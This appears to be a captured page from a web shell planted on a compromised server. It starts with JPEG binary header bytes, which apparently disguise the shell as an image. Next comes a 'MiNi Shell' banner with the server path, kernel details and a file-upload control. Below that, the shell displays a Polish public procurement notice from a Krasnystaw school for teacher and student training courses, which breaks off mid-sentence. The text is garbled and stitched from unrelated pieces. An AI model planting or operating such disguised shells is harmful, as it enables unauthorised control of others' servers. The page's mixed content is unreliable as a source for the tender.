JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211027/0024788401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie szkoleń i kursów dla nauczycieli i uczniów Zespołu Szkół nr 2 w Krasnymstawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ NR 2 IM. B. GŁOWACKIEGO W KRASNYMSTAWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000095609</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sobieskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krasnystaw</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 576 30 65</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 576 30 61</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat-glowacki.p9@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zs2krasnystaw.edu.pl/index.php</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie szkoleń i kursów dla nauczycieli i uczniów Zespołu Szkół nr 2 w Krasnymstawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0edeffc7-2a6d-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00247884</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00227230/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przeprowadzenie szkolenia dla nauczycieli i ucznów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Nowoczesna edukacja szansą rozwoju młodzieży Zespołu Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie” działanie 12.4. Kształcenie zawodowe, realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014 – 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://glowacki.bip.e-zeto.eu/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej - sekretariat-glowacki.p9@wp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Aneta Przybyła , tel. 82 576 30 65, <br/>email: sekretariat-glowacki.p9@wp.pl<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń<br/>mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych: <br/>* specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>* format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>* oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,<br/>* integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>* Microsoft Internet Explorer od wersji 9.0,<br/>* Mozilla Firefox od wersji 15,<br/>* Google Chrome od wersji 20.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>Zamawiający przekazuje identyfikator postępowania na miniPortalu jako załącznik do SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozp. PE i Rady (UE) 2016/679 z<br/>dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postęp. o udzielenie zam. publ. na zadanie pn.: Zorganizowanie i przeprowadzenie kursów i szkoleń dla nauczycieli i uczniów Zespołu Szkół nr 2 w Krasnymstawie prowadzonym w trybie podstawowym bez negocjacji;<br/>3) odbiorcami danych osobowych Wyk. będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11.09.2019 r. Prawo<br/>zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postęp. o udzielenie zamówienia, w sposób gwarantujący jego<br/>nienaruszalność.<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zam. publ.; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zam. w BZP, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZS.2.262.12.4.Sz.V.2018-2020</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 117840 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenie dla nauczycieli z tworzenia e-materiałów oraz wykorzystania technologii w zdalnym nauczaniu.<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: Nauczyciele Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba osób i czas trwania szkolenia: 8 osób, godzin: 30 h<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	5) Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć,<br/>b)	przygotować materiały szkoleniowe,<br/>c)	przygotować i przeprowadzić testy wiedzy (początkowy i końcowy),<br/>d)	wydać zaświadczenie o ukończeniu kursu,<br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego), polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>b)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>c)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> : Kurs programowania C++ dla uczniów dla uczniów:<br/>1)	Miejsce realizacji zajęć teoretycznych i praktycznych: Zespół Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 2 grupy po 8 osób, 40h na 1 grupę.<br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>a)	przygotować program zajęć,<br/>b)	przygotować materiały szkoleniowe,<br/>c)	przygotować i przeprowadzić testy wiedzy (początkowy i końcowy),<br/>d)	wydać zaświadczenie o ukończeniu kursu,<br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>a)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum<br/>b)	widok trenera),<br/>c)	prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów<br/>d)	przesłanych przez Uczestników Projektu,<br/>e)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy<br/>f)	mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne<br/>g)	w formie skanów przesyłane do Zamawiającego,<br/>h)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur<br/>i)	związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu.<br/>8)	Przykładowe tematy zajęć: Budowa programy w języku C++, Tworzenie programu, Kody , Podstawowe operatory, Strumienie i operacje, Instrukcje, Modyfikatory, Tablice w języku C++, Pętle w języku C++, Wskaźniki i referaty, Funkcje, Typy danych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80533200-1 - Kursy komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za 